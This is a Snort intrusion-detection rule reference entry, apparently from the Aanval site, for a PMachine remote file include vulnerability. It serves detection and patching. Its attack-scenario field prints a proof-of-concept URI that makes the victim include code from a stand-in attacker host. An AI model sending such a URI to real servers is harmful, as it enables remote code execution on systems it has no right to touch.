Provided by Aanval (Snort & Syslog Intrusion Detection and Correlation Engine) www.aanval.com
--
GEN:SID | 1:2226 |
Message | WEB-PHP pmachine remote file include attempt |
Summary | This event is generated when an attempt is made to exploit a known vulnerability in the PHP application pmachine. |
Impact | Execution of arbitrary code possibly leading to a remote shell. |
Detailed Information | Versions of PMachine do not properly check included files and it is possible for an attacker to include a file of their choosing which may lead to arbitrary code execution on the target host. |
Affected Systems | PMachine PMachine 2.2.1 |
Attack Scenarios | The attacker can include a file of their choosing by appending the file URI to the end of a URI for the application. Proof of concept URI by FrogMan: http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt |
Ease of Attack | Simple. No exploit software required. |
Corrective Action | Upgrade to the latest non-affected version of the software. |
Additional References | |
Rule References | bugtraq: 7919 nessus: 11739 |
--
DID:121782
--
http://www.aanval.com/